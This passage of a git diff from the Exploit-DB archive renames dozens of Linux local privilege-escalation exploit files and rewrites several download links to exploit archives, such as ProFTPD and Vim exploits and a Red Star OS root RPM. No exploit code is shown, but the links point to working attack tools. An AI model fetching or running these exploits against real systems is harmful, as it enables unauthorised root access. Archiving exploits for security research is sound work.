a/platforms/linux/local/26451.rb b/exploits/linux/local/26451.rb similarity index 100% rename from platforms/linux/local/26451.rb rename to exploits/linux/local/26451.rb diff --git a/platforms/linux/local/26492.txt b/exploits/linux/local/26492.txt similarity index 100% rename from platforms/linux/local/26492.txt rename to exploits/linux/local/26492.txt diff --git a/platforms/linux/local/26498.txt b/exploits/linux/local/26498.txt similarity index 100% rename from platforms/linux/local/26498.txt rename to exploits/linux/local/26498.txt diff --git a/platforms/linux/local/27056.pl b/exploits/linux/local/27056.pl similarity index 100% rename from platforms/linux/local/27056.pl rename to exploits/linux/local/27056.pl diff --git a/platforms/linux/local/27057.py b/exploits/linux/local/27057.py similarity index 100% rename from platforms/linux/local/27057.py rename to exploits/linux/local/27057.py diff --git a/platforms/linux/local/27065.txt b/exploits/linux/local/27065.txt similarity index 100% rename from platforms/linux/local/27065.txt rename to exploits/linux/local/27065.txt diff --git a/platforms/linux/local/27066.txt b/exploits/linux/local/27066.txt similarity index 100% rename from platforms/linux/local/27066.txt rename to exploits/linux/local/27066.txt diff --git a/platforms/linux/local/27231.txt b/exploits/linux/local/27231.txt similarity index 100% rename from platforms/linux/local/27231.txt rename to exploits/linux/local/27231.txt diff --git a/platforms/linux/local/27297.c b/exploits/linux/local/27297.c similarity index 100% rename from platforms/linux/local/27297.c rename to exploits/linux/local/27297.c diff --git a/platforms/linux/local/273.c b/exploits/linux/local/273.c similarity index 100% rename from platforms/linux/local/273.c rename to exploits/linux/local/273.c diff --git a/platforms/linux/local/27461.c b/exploits/linux/local/27461.c similarity index 100% rename from platforms/linux/local/27461.c rename to exploits/linux/local/27461.c diff --git a/platforms/linux/local/27766.txt b/exploits/linux/local/27766.txt similarity index 100% rename from platforms/linux/local/27766.txt rename to exploits/linux/local/27766.txt diff --git a/platforms/linux/local/27769.txt b/exploits/linux/local/27769.txt similarity index 100% rename from platforms/linux/local/27769.txt rename to exploits/linux/local/27769.txt diff --git a/platforms/linux/local/27938.rb b/exploits/linux/local/27938.rb similarity index 100% rename from platforms/linux/local/27938.rb rename to exploits/linux/local/27938.rb diff --git a/platforms/linux/local/28287.c b/exploits/linux/local/28287.c similarity index 100% rename from platforms/linux/local/28287.c rename to exploits/linux/local/28287.c diff --git a/platforms/linux/local/28288.c b/exploits/linux/local/28288.c similarity index 100% rename from platforms/linux/local/28288.c rename to exploits/linux/local/28288.c diff --git a/platforms/linux/local/28332.rb b/exploits/linux/local/28332.rb similarity index 100% rename from platforms/linux/local/28332.rb rename to exploits/linux/local/28332.rb diff --git a/platforms/linux/local/28405.txt b/exploits/linux/local/28405.txt similarity index 100% rename from platforms/linux/local/28405.txt rename to exploits/linux/local/28405.txt diff --git a/platforms/linux/local/285.c b/exploits/linux/local/285.c similarity index 100% rename from platforms/linux/local/285.c rename to exploits/linux/local/285.c diff --git a/platforms/linux/local/28657.c b/exploits/linux/local/28657.c similarity index 100% rename from platforms/linux/local/28657.c rename to exploits/linux/local/28657.c diff --git a/platforms/linux/local/28680.txt b/exploits/linux/local/28680.txt similarity index 100% rename from platforms/linux/local/28680.txt rename to exploits/linux/local/28680.txt diff --git a/platforms/linux/local/28806.txt b/exploits/linux/local/28806.txt similarity index 100% rename from platforms/linux/local/28806.txt rename to exploits/linux/local/28806.txt diff --git a/platforms/linux/local/290.tcsh b/exploits/linux/local/290.tcsh old mode 100644 new mode 100755 similarity index 100% rename from platforms/linux/local/290.tcsh rename to exploits/linux/local/290.tcsh diff --git a/platforms/linux/local/29446.c b/exploits/linux/local/29446.c similarity index 100% rename from platforms/linux/local/29446.c rename to exploits/linux/local/29446.c diff --git a/platforms/linux/local/29467.c b/exploits/linux/local/29467.c similarity index 100% rename from platforms/linux/local/29467.c rename to exploits/linux/local/29467.c diff --git a/platforms/linux/local/29714.txt b/exploits/linux/local/29714.txt similarity index 95% rename from platforms/linux/local/29714.txt rename to exploits/linux/local/29714.txt index 834dfac0b..2d324bc44 100644 --- a/platforms/linux/local/29714.txt +++ b/exploits/linux/local/29714.txt @@ -30,4 +30,4 @@ to exploit this bug silently. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/29714.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/29714.tgz \ No newline at end of file diff --git a/platforms/linux/local/29746.txt b/exploits/linux/local/29746.txt similarity index 100% rename from platforms/linux/local/29746.txt rename to exploits/linux/local/29746.txt diff --git a/platforms/linux/local/29822.c b/exploits/linux/local/29822.c similarity index 100% rename from platforms/linux/local/29822.c rename to exploits/linux/local/29822.c diff --git a/platforms/linux/local/29954.txt b/exploits/linux/local/29954.txt similarity index 100% rename from platforms/linux/local/29954.txt rename to exploits/linux/local/29954.txt diff --git a/platforms/linux/local/3.c b/exploits/linux/local/3.c similarity index 100% rename from platforms/linux/local/3.c rename to exploits/linux/local/3.c diff --git a/platforms/linux/local/30093.txt b/exploits/linux/local/30093.txt similarity index 100% rename from platforms/linux/local/30093.txt rename to exploits/linux/local/30093.txt diff --git a/platforms/linux/local/30280.txt b/exploits/linux/local/30280.txt similarity index 100% rename from platforms/linux/local/30280.txt rename to exploits/linux/local/30280.txt diff --git a/platforms/linux/local/30464.c b/exploits/linux/local/30464.c similarity index 100% rename from platforms/linux/local/30464.c rename to exploits/linux/local/30464.c diff --git a/platforms/linux/local/30503.txt b/exploits/linux/local/30503.txt similarity index 100% rename from platforms/linux/local/30503.txt rename to exploits/linux/local/30503.txt diff --git a/platforms/linux/local/30604.c b/exploits/linux/local/30604.c similarity index 100% rename from platforms/linux/local/30604.c rename to exploits/linux/local/30604.c diff --git a/platforms/linux/local/30605.c b/exploits/linux/local/30605.c similarity index 100% rename from platforms/linux/local/30605.c rename to exploits/linux/local/30605.c diff --git a/platforms/linux/local/30620.txt b/exploits/linux/local/30620.txt similarity index 100% rename from platforms/linux/local/30620.txt rename to exploits/linux/local/30620.txt diff --git a/platforms/linux/local/30780.txt b/exploits/linux/local/30780.txt similarity index 100% rename from platforms/linux/local/30780.txt rename to exploits/linux/local/30780.txt diff --git a/platforms/linux/local/30839.c b/exploits/linux/local/30839.c similarity index 100% rename from platforms/linux/local/30839.c rename to exploits/linux/local/30839.c diff --git a/platforms/linux/local/31.pl b/exploits/linux/local/31.pl similarity index 100% rename from platforms/linux/local/31.pl rename to exploits/linux/local/31.pl diff --git a/platforms/linux/local/31151.c b/exploits/linux/local/31151.c similarity index 100% rename from platforms/linux/local/31151.c rename to exploits/linux/local/31151.c diff --git a/platforms/linux/local/31346.c b/exploits/linux/local/31346.c similarity index 100% rename from platforms/linux/local/31346.c rename to exploits/linux/local/31346.c diff --git a/platforms/linux/local/3154.c b/exploits/linux/local/3154.c similarity index 100% rename from platforms/linux/local/3154.c rename to exploits/linux/local/3154.c diff --git a/platforms/linux/local/317.txt b/exploits/linux/local/317.txt similarity index 100% rename from platforms/linux/local/317.txt rename to exploits/linux/local/317.txt diff --git a/platforms/linux/local/319.c b/exploits/linux/local/319.c similarity index 100% rename from platforms/linux/local/319.c rename to exploits/linux/local/319.c diff --git a/platforms/linux/local/31911.txt b/exploits/linux/local/31911.txt similarity index 83% rename from platforms/linux/local/31911.txt rename to exploits/linux/local/31911.txt index f6b3c9739..ecb83bb92 100644 --- a/platforms/linux/local/31911.txt +++ b/exploits/linux/local/31911.txt @@ -6,6 +6,6 @@ Successfully exploiting these issues can allow an attacker to execute arbitrary Vim 7.1.298 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31911-1.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31911-2.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31911-3.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31911-1.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31911-2.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/31911-3.zip \ No newline at end of file diff --git a/platforms/linux/local/31959.txt b/exploits/linux/local/31959.txt similarity index 100% rename from platforms/linux/local/31959.txt rename to exploits/linux/local/31959.txt diff --git a/platforms/linux/local/320.pl b/exploits/linux/local/320.pl similarity index 100% rename from platforms/linux/local/320.pl rename to exploits/linux/local/320.pl diff --git a/platforms/linux/local/3213.c b/exploits/linux/local/3213.c similarity index 100% rename from platforms/linux/local/3213.c rename to exploits/linux/local/3213.c diff --git a/platforms/linux/local/322.c b/exploits/linux/local/322.c similarity index 100% rename from platforms/linux/local/322.c rename to exploits/linux/local/322.c diff --git a/platforms/linux/local/32446.txt b/exploits/linux/local/32446.txt similarity index 100% rename from platforms/linux/local/32446.txt rename to exploits/linux/local/32446.txt diff --git a/platforms/linux/local/325.c b/exploits/linux/local/325.c similarity index 100% rename from platforms/linux/local/325.c rename to exploits/linux/local/325.c diff --git a/platforms/linux/local/32700.rb b/exploits/linux/local/32700.rb similarity index 100% rename from platforms/linux/local/32700.rb rename to exploits/linux/local/32700.rb diff --git a/platforms/linux/local/32805.c b/exploits/linux/local/32805.c similarity index 100% rename from platforms/linux/local/32805.c rename to exploits/linux/local/32805.c diff --git a/platforms/linux/local/32820.txt b/exploits/linux/local/32820.txt similarity index 100% rename from platforms/linux/local/32820.txt rename to exploits/linux/local/32820.txt diff --git a/platforms/linux/local/32829.c b/exploits/linux/local/32829.c similarity index 100% rename from platforms/linux/local/32829.c rename to exploits/linux/local/32829.c diff --git a/platforms/linux/local/32848.txt b/exploits/linux/local/32848.txt similarity index 100% rename from platforms/linux/local/32848.txt rename to exploits/linux/local/32848.txt diff --git a/platforms/linux/local/32947.txt b/exploits/linux/local/32947.txt similarity index 100% rename from platforms/linux/local/32947.txt rename to exploits/linux/local/32947.txt diff --git a/platforms/linux/local/33028.txt b/exploits/linux/local/33028.txt similarity index 100% rename from platforms/linux/local/33028.txt rename to exploits/linux/local/33028.txt diff --git a/platforms/linux/local/331.c b/exploits/linux/local/331.c similarity index 100% rename from platforms/linux/local/331.c rename to exploits/linux/local/331.c diff --git a/platforms/linux/local/33145.c b/exploits/linux/local/33145.c similarity index 100% rename from platforms/linux/local/33145.c rename to exploits/linux/local/33145.c diff --git a/platforms/linux/local/33255.txt b/exploits/linux/local/33255.txt similarity index 100% rename from platforms/linux/local/33255.txt rename to exploits/linux/local/33255.txt diff --git a/platforms/linux/local/3330.pl b/exploits/linux/local/3330.pl similarity index 100% rename from platforms/linux/local/3330.pl rename to exploits/linux/local/3330.pl diff --git a/platforms/linux/local/33321.c b/exploits/linux/local/33321.c similarity index 100% rename from platforms/linux/local/33321.c rename to exploits/linux/local/33321.c diff --git a/platforms/linux/local/33322.c b/exploits/linux/local/33322.c similarity index 100% rename from platforms/linux/local/33322.c rename to exploits/linux/local/33322.c diff --git a/platforms/linux/local/3333.pl b/exploits/linux/local/3333.pl similarity index 100% rename from platforms/linux/local/3333.pl rename to exploits/linux/local/3333.pl diff --git a/platforms/linux/local/33336.c b/exploits/linux/local/33336.c similarity index 100% rename from platforms/linux/local/33336.c rename to exploits/linux/local/33336.c diff --git a/platforms/linux/local/33387.txt b/exploits/linux/local/33387.txt similarity index 100% rename from platforms/linux/local/33387.txt rename to exploits/linux/local/33387.txt diff --git a/platforms/linux/local/33395.txt b/exploits/linux/local/33395.txt similarity index 91% rename from platforms/linux/local/33395.txt rename to exploits/linux/local/33395.txt index 8743517b4..824d2a288 100644 --- a/platforms/linux/local/33395.txt +++ b/exploits/linux/local/33395.txt @@ -6,4 +6,4 @@ Exploits may allow attackers to execute arbitrary code with kernel-level privile Successful exploits will result in the complete compromise of affected computers. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/33395.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/33395.tgz \ No newline at end of file diff --git a/platforms/linux/local/33508.txt b/exploits/linux/local/33508.txt similarity index 100% rename from platforms/linux/local/33508.txt rename to exploits/linux/local/33508.txt diff --git a/platforms/linux/local/33523.c b/exploits/linux/local/33523.c similarity index 100% rename from platforms/linux/local/33523.c rename to exploits/linux/local/33523.c diff --git a/platforms/linux/local/3356.sh b/exploits/linux/local/3356.sh similarity index 100% rename from platforms/linux/local/3356.sh rename to exploits/linux/local/3356.sh diff --git a/platforms/linux/local/33576.txt b/exploits/linux/local/33576.txt similarity index 100% rename from platforms/linux/local/33576.txt rename to exploits/linux/local/33576.txt diff --git a/platforms/linux/local/33604.sh b/exploits/linux/local/33604.sh similarity index 100% rename from platforms/linux/local/33604.sh rename to exploits/linux/local/33604.sh diff --git a/platforms/linux/local/33614.c b/exploits/linux/local/33614.c similarity index 100% rename from platforms/linux/local/33614.c rename to exploits/linux/local/33614.c diff --git a/platforms/linux/local/33623.txt b/exploits/linux/local/33623.txt similarity index 100% rename from platforms/linux/local/33623.txt rename to exploits/linux/local/33623.txt diff --git a/platforms/linux/local/33808.c b/exploits/linux/local/33808.c similarity index 100% rename from platforms/linux/local/33808.c rename to exploits/linux/local/33808.c diff --git a/platforms/linux/local/33824.c b/exploits/linux/local/33824.c similarity index 100% rename from platforms/linux/local/33824.c rename to exploits/linux/local/33824.c diff --git a/platforms/linux/local/3384.c b/exploits/linux/local/3384.c similarity index 100% rename from platforms/linux/local/3384.c rename to exploits/linux/local/3384.c diff --git a/platforms/linux/local/33899.txt b/exploits/linux/local/33899.txt similarity index 100% rename from platforms/linux/local/33899.txt rename to exploits/linux/local/33899.txt diff --git a/platforms/linux/local/339.c b/exploits/linux/local/339.c similarity index 100% rename from platforms/linux/local/339.c rename to exploits/linux/local/339.c diff --git a/platforms/linux/local/33904.txt b/exploits/linux/local/33904.txt similarity index 100% rename from platforms/linux/local/33904.txt rename to exploits/linux/local/33904.txt diff --git a/platforms/linux/local/33963.txt b/exploits/linux/local/33963.txt similarity index 100% rename from platforms/linux/local/33963.txt rename to exploits/linux/local/33963.txt diff --git a/platforms/linux/local/34001.c b/exploits/linux/local/34001.c similarity index 100% rename from platforms/linux/local/34001.c rename to exploits/linux/local/34001.c diff --git a/platforms/linux/local/3426.php b/exploits/linux/local/3426.php similarity index 100% rename from platforms/linux/local/3426.php rename to exploits/linux/local/3426.php diff --git a/platforms/linux/local/34267.sh b/exploits/linux/local/34267.sh similarity index 100% rename from platforms/linux/local/34267.sh rename to exploits/linux/local/34267.sh diff --git a/platforms/linux/local/3427.php b/exploits/linux/local/3427.php similarity index 100% rename from platforms/linux/local/3427.php rename to exploits/linux/local/3427.php diff --git a/platforms/linux/local/3440.php b/exploits/linux/local/3440.php similarity index 100% rename from platforms/linux/local/3440.php rename to exploits/linux/local/3440.php diff --git a/platforms/linux/local/34421.c b/exploits/linux/local/34421.c similarity index 96% rename from platforms/linux/local/34421.c rename to exploits/linux/local/34421.c index 87fe852c6..8101bbd34 100644 --- a/platforms/linux/local/34421.c +++ b/exploits/linux/local/34421.c @@ -1,5 +1,5 @@ // -// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34421.tar.gz (CVE-2014-5119.tar.gz) +// Full Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz (CVE-2014-5119.tar.gz) // // // --------------------------------------------------- diff --git a/platforms/linux/local/34537.txt b/exploits/linux/local/34537.txt similarity index 91% rename from platforms/linux/local/34537.txt rename to exploits/linux/local/34537.txt index f3503cbe2..04b4f7d4a 100644 --- a/platforms/linux/local/34537.txt +++ b/exploits/linux/local/34537.txt @@ -6,4 +6,4 @@ Three flaws have been identified that contribute to a weakening of the protectio Attackers may leverage these weaknesses to attack encrypted files through watermarking or other techniques. Successful attacks may disclose sensitive information. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/34537.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34537.tar.gz \ No newline at end of file diff --git a/platforms/linux/local/3479.php b/exploits/linux/local/3479.php similarity index 100% rename from platforms/linux/local/3479.php rename to exploits/linux/local/3479.php diff --git a/platforms/linux/local/3480.php b/exploits/linux/local/3480.php similarity index 100% rename from platforms/linux/local/3480.php rename to exploits/linux/local/3480.php diff --git a/platforms/linux/local/34923.c b/exploits/linux/local/34923.c similarity index 100% rename from platforms/linux/local/34923.c rename to exploits/linux/local/34923.c diff --git a/platforms/linux/local/34987.c b/exploits/linux/local/34987.c similarity index 100% rename from platforms/linux/local/34987.c rename to exploits/linux/local/34987.c diff --git a/platforms/linux/local/3499.php b/exploits/linux/local/3499.php similarity index 100% rename from platforms/linux/local/3499.php rename to exploits/linux/local/3499.php diff --git a/platforms/linux/local/35021.rb b/exploits/linux/local/35021.rb similarity index 100% rename from platforms/linux/local/35021.rb rename to exploits/linux/local/35021.rb diff --git a/platforms/linux/local/35112.sh b/exploits/linux/local/35112.sh similarity index 100% rename from platforms/linux/local/35112.sh rename to exploits/linux/local/35112.sh diff --git a/platforms/linux/local/35161.c b/exploits/linux/local/35161.c similarity index 100% rename from platforms/linux/local/35161.c rename to exploits/linux/local/35161.c diff --git a/platforms/linux/local/35234.py b/exploits/linux/local/35234.py similarity index 100% rename from platforms/linux/local/35234.py rename to exploits/linux/local/35234.py diff --git a/platforms/linux/local/3525.php b/exploits/linux/local/3525.php similarity index 100% rename from platforms/linux/local/3525.php rename to exploits/linux/local/3525.php diff --git a/platforms/linux/local/3529.php b/exploits/linux/local/3529.php similarity index 100% rename from platforms/linux/local/3529.php rename to exploits/linux/local/3529.php diff --git a/platforms/linux/local/35370.c b/exploits/linux/local/35370.c similarity index 100% rename from platforms/linux/local/35370.c rename to exploits/linux/local/35370.c diff --git a/platforms/linux/local/35450.txt b/exploits/linux/local/35450.txt similarity index 100% rename from platforms/linux/local/35450.txt rename to exploits/linux/local/35450.txt diff --git a/platforms/linux/local/35595.txt b/exploits/linux/local/35595.txt similarity index 100% rename from platforms/linux/local/35595.txt rename to exploits/linux/local/35595.txt diff --git a/platforms/linux/local/35681.txt b/exploits/linux/local/35681.txt similarity index 100% rename from platforms/linux/local/35681.txt rename to exploits/linux/local/35681.txt diff --git a/platforms/linux/local/3571.php b/exploits/linux/local/3571.php similarity index 100% rename from platforms/linux/local/3571.php rename to exploits/linux/local/3571.php diff --git a/platforms/linux/local/3572.php b/exploits/linux/local/3572.php similarity index 100% rename from platforms/linux/local/3572.php rename to exploits/linux/local/3572.php diff --git a/platforms/linux/local/35746.sh b/exploits/linux/local/35746.sh similarity index 100% rename from platforms/linux/local/35746.sh rename to exploits/linux/local/35746.sh diff --git a/platforms/linux/local/35748.txt b/exploits/linux/local/35748.txt similarity index 100% rename from platforms/linux/local/35748.txt rename to exploits/linux/local/35748.txt diff --git a/platforms/linux/local/35749.txt b/exploits/linux/local/35749.txt similarity index 92% rename from platforms/linux/local/35749.txt rename to exploits/linux/local/35749.txt index 56b951ee1..288edda95 100644 --- a/platforms/linux/local/35749.txt +++ b/exploits/linux/local/35749.txt @@ -10,7 +10,7 @@ but disabling it is a matter of running setenforce 0 as root. Download: https://mega.co.nz/#!jgBT0RxZ!LQDEBBrbGxE6fag4d_A2C2cWj2PSNR_ZvnSW_UjRD5E -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/35749.rpm (redstarroot.rpm) +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/35749.rpm (redstarroot.rpm) ## Source: http://richardg867.wordpress.com/2015/01/01/notes-on-red-star-os-3-0/ & http://www.openwall.com/lists/oss-security/2015/01/09/1 \ No newline at end of file diff --git a/platforms/linux/local/3587.c b/exploits/linux/local/3587.c similarity index 100% rename from platforms/linux/local/3587.c rename to exploits/linux/local/3587.c diff --git a/platforms/linux/local/3595.c b/exploits/linux/local/3595.c similarity index 100% rename from platforms/linux/local/3595.c rename to exploits/linux/local/3595.c diff --git a/platforms/linux/local/36229.py b/exploits/linux/local/36229.py similarity index 100% rename from platforms/linux/local/36229.py rename to exploits/linux/local/36229.py diff --git a/platforms/linux/local/36257.txt b/exploits/linux/local/36257.txt similarity index 100% rename from platforms/linux/local/36257.txt rename to exploits/linux/local/36257.txt diff --git a/platforms/linux/local/36294.c b/exploits/linux/local/36294.c similarity index 100% rename from platforms/linux/local/36294.c rename to exploits/linux/local/36294.c diff --git a/platforms/linux/local/36430.sh b/exploits/linux/local/36430.sh similarity index 100% rename from platforms/linux/local/36430.sh rename to exploits/linux/local/36430.sh diff --git a/platforms/linux/local/36564.txt b/exploits/linux/local/36564.txt similarity index 100% rename from platforms/linux/local/36564.txt rename to exploits/linux/local/36564.txt diff --git a/platforms/linux/local/36571.sh b/exploits/linux/local/36571.sh similarity index 100% rename from platforms/linux/local/36571.sh rename to exploits/linux/local/36571.sh diff --git a/platforms/linux/local/36746.c b/exploits/linux/local/36746.c similarity index 100% rename from platforms/linux/local/36746.c rename to exploits/linux/local/36746.c diff --git a/platforms/linux/local/36747.c b/exploits/linux/local/36747.c similarity index 100% rename from platforms/linux/local/36747.c rename to exploits/linux/local/36747.c diff --git a/platforms/linux/local/36782.sh b/exploits/linux/local/36782.sh similarity index 100% rename from platforms/linux/local/36782.sh rename to exploits/linux/local/36782.sh diff --git a/platforms/linux/local/36820.txt b/exploits/linux/local/36820.txt similarity index 100% rename from platforms/linux/local/36820.txt rename to exploits/linux/local/36820.txt diff --git a/platforms/linux/local/36855.py b/exploits/linux/local/36855.py similarity index 100% rename from platforms/linux/local/36855.py rename to exploits/linux/local/36855.py diff --git a/platforms/linux/local/36887.py b/exploits/linux/local/36887.py similarity index 100% rename from platforms/linux/local/36887.py rename to exploits/linux/local/36887.py diff --git a/platforms/linux/local/369.pl b/exploits/linux/local/369.pl similarity index 100% rename from platforms/linux/local/369.pl rename to exploits/linux/local/369.pl diff --git a/platforms/linux/local/36966.txt b/exploits/linux/local/36966.txt similarity index 100% rename from platforms/linux/local/36966.txt rename to exploits/linux/local/36966.txt diff --git a/platforms/linux/local/37088.c b/exploits/linux/local/37088.c similarity index 100% rename from platforms/linux/local/37088.c rename to exploits/linux/local/37088.c diff --git a/platforms/linux/local/37089.txt b/exploits/linux/local/37089.txt similarity index 100% rename from platforms/linux/local/37089.txt rename to exploits/linux/local/37089.txt diff --git a/platforms/linux/local/37167.c b/exploits/linux/local/37167.c similarity index 100% rename from platforms/linux/local/37167.c rename to exploits/linux/local/37167.c diff --git a/platforms/linux/local/37168.txt b/exploits/linux/local/37168.txt similarity index 88% rename from platforms/linux/local/37168.txt rename to exploits/linux/local/37168.txt index c6239e8cb..d02f90e8f 100644 --- a/platforms/linux/local/37168.txt +++ b/exploits/linux/local/37168.txt @@ -9,6 +9,6 @@ # CVE : N/A Source: https://github.com/mdsecresearch/Publications/blob/master/exploits/rainbowdash.tgz?raw=true -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37168.tgz +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/37168.tgz Blog post for more detail: http://blog.mdsec.co.uk/2015/05/my-lulzy-pwniez-abusing-kernel-elf.html \ No newline at end of file diff --git a/platforms/linux/local/37183.c b/exploits/linux/local/37183.c similarity index 100% rename from platforms/linux/local/37183.c rename to exploits/linux/local/37183.c diff --git a/platforms/linux/local/37265.txt b/exploits/linux/local/37265.txt similarity index 100% rename from platforms/linux/local/37265.txt rename to exploits/linux/local/37265.txt diff --git a/platforms/linux/local/37292.c b/exploits/linux/local/37292.c similarity index 100% rename from platforms/linux/local/37292.c rename to exploits/linux/local/37292.c diff --git a/platforms/linux/local/37293.txt b/exploits/linux/local/37293.txt similarity index 100% rename from platforms/linux/local/37293.txt rename to exploits/linux/local/37293.txt diff --git a/platforms/linux/local/3730.txt b/exploits/linux/local/3730.txt similarity index 69% rename from platforms/linux/local/3730.txt rename to exploits/linux/local/3730.txt index 2ca63cda4..173973310 100644 --- a/platforms/linux/local/3730.txt +++ b/exploits/linux/local/3730.txt @@ -1,5 +1,5 @@ ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield) -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/3730.tgz (04132007-pr0ftpd_modctrls.tgz) # milw0rm.com [2007-04-13] \ No newline at end of file diff --git a/platforms/linux/local/374.c b/exploits/linux/local/374.c similarity index 100% rename from platforms/linux/local/374.c rename to exploits/linux/local/374.c diff --git a/platforms/linux/local/375.c b/exploits/linux/local/375.c similarity index 100% rename from platforms/linux/local/375.c rename to exploits/linux/local/375.c diff --git a/platforms/linux/local/37543.c b/exploits/linux/local/37543.c similarity index 100% rename from platforms/linux/local/37543.c rename to exploits/linux/local/37543.c diff --git a/platforms/linux/local/37631.c b/exploits/linux/local/37631.c similarity index 100% rename from platforms/linux/local/37631.c rename to exploits/linux/local/37631.c diff --git a/platforms/linux/local/37710.txt b/exploits/linux/local/37710.txt similarity index 100% rename from platforms/linux/local/37710.txt rename to exploits/linux/local/37710.txt diff --git a/platforms/linux/local/37898.py b/exploits/linux/local/37898.py similarity index 100% rename from platforms/linux/local/37898.py rename to exploits/linux/local/37898.py diff --git a/platforms/linux/local/37937.c b/exploits/linux/local/37937.c similarity index 100% rename from platforms/linux/local/37937.c rename to exploits/linux/local/37937.c diff --git a/platforms/linux/local/37975.py b/exploits/linux/local/37975.py similarity index 100% rename from platforms/linux/local/37975.py rename to exploits/linux/local/37975.py diff --git a/platforms/linux/local/37987.py b/exploits/linux/local/37987.py similarity index 100% rename from platforms/linux/local/37987.py rename to exploits/linux/local/37987.py diff --git a/platforms/linux/local/37988.py b/exploits/linux/local/37988.py similarity index 100% rename from platforms/linux/local/37988.py rename to exploits/linux/local/37988.py diff --git a/platforms/linux/local/38232.txt b/exploits/linux/local/38232.txt similarity index 100% rename from platforms/linux/local/38232.txt rename to exploits/linux/local/38232.txt diff --git a/platforms/linux/local/38298.txt b/exploits/linux/local/38298.txt similarity index 100% rename from platforms/linux/local/38298.txt rename to exploits/linux/local/38298.txt diff --git a/platforms/linux/local/38353.txt b/exploits/linux/local/38353.txt similarity index 96% rename from platforms/linux/local/38353.txt rename to exploits/linux/local/38353.txt index 939d04f7e..31138a7bc 100644 --- a/platforms/linux/local/38353.txt +++ b/exploits/linux/local/38353.txt @@ -10,4 +10,4 @@ open("/var/crash/vmcore.log", O_RDONLY|O_LARGEFILE|O_CLOEXEC) = 31 Thus the output file is opened unconditionally and without O_EXCL or O_NOFOLLOW. Also opening of input file does not care about links. Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38353.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/38353.zip \ No newline at end of file diff --git a/platforms/linux/local/38357.c b/exploits/linux/local/38357.c similarity index 100% rename from platforms/linux/local/38357.c rename to exploits/linux/local/38357.c diff --git a/platforms/linux/local/38390.c b/exploits/linux/local/38390.c similarity index 100% rename from platforms/linux/local/38390.c rename to exploits/linux/local/38390.c diff --git a/platforms/linux/local/38473.py b/exploits/linux/local/38473.py similarity index 100% rename from platforms/linux/local/38473.py rename to exploits/linux/local/38473.py diff --git a/platforms/linux/local/38559.txt b/exploits/linux/local/38559.txt similarity index 100% rename from platforms/linux/local/38559.txt rename to exploits/linux/local/38559.txt diff --git a/platforms/linux/local/38775.rb b/exploits/linux/local/38775.rb similarity index 100% rename from platforms/linux/local/38775.rb rename to exploits/linux/local/38775.rb diff --git a/platforms/linux/local/38817.txt b/exploits/linux/local/38817.txt similarity index 100% rename from platforms/linux/local/38817.txt rename to exploits/linux/local/38817.txt diff --git a/platforms/linux/local/38832.py b/exploits/linux/local/38832.py similarity index 100% rename from platforms/linux/local/38832.py rename to exploits/linux/local/38832.py diff --git a/platforms/linux/local/38937.txt b/exploits/linux/local/38937.txt similarity index 100% rename from platforms/linux/local/38937.txt rename to exploits/linux/local/38937.txt diff --git a/platforms/linux/local/39010.c b/exploits/linux/local/39010.c similarity index 100% rename from platforms/linux/local/39010.c rename to exploits/linux/local/39010.c diff --git a/platforms/linux/local/39112.txt b/exploits/linux/local/39112.txt similarity index 100% rename from platforms/linux/local/39112.txt rename to exploits/linux/local/39112.txt diff --git a/platforms/linux/local/39134.txt b/exploits/linux/local/39134.txt similarity index 100% rename from platforms/linux/local/39134.txt rename to exploits/linux/local/39134.txt diff --git a/platforms/linux/local/39166.c b/exploits/linux/local/39166.c similarity index 100% rename from platforms/linux/local/39166.c rename to exploits/linux/local/39166.c diff --git a/platforms/linux/local/39207.txt b/exploits/linux/local/39207.txt similarity index 100% rename from platforms/linux/local/39207.txt rename to exploits/linux/local/39207.txt diff --git a/platforms/linux/local/39214.c b/exploits/linux/local/39214.c similarity index 100% rename from platforms/linux/local/39214.c rename to exploits/linux/local/39214.c diff --git a/platforms/linux/local/39217.c b/exploits/linux/local/39217.c similarity index 100% rename from platforms/linux/local/39217.c rename to exploits/linux/local/39217.c diff --git a/platforms/linux/local/39230.c b/exploits/linux/local/39230.c similarity index 100% rename from platforms/linux/local/39230.c rename to exploits/linux/local/39230.c diff --git a/platforms/linux/local/39244.txt b/exploits/linux/local/39244.txt similarity index 100% rename from platforms/linux/local/39244.txt rename to exploits/linux/local/39244.txt diff --git a/platforms/linux/local/39277.c b/exploits/linux/local/39277.c similarity index 100% rename from platforms/linux/local/39277.c rename to exploits/linux/local/39277.c diff --git a/platforms/linux/local/39285.py b/exploits/linux/local/39285.py similarity index 100% rename from platforms/linux/local/39285.py rename to exploits/linux/local/39285.py diff --git a/platforms/linux/local/393.c b/exploits/linux/local/393.c similarity index 100% 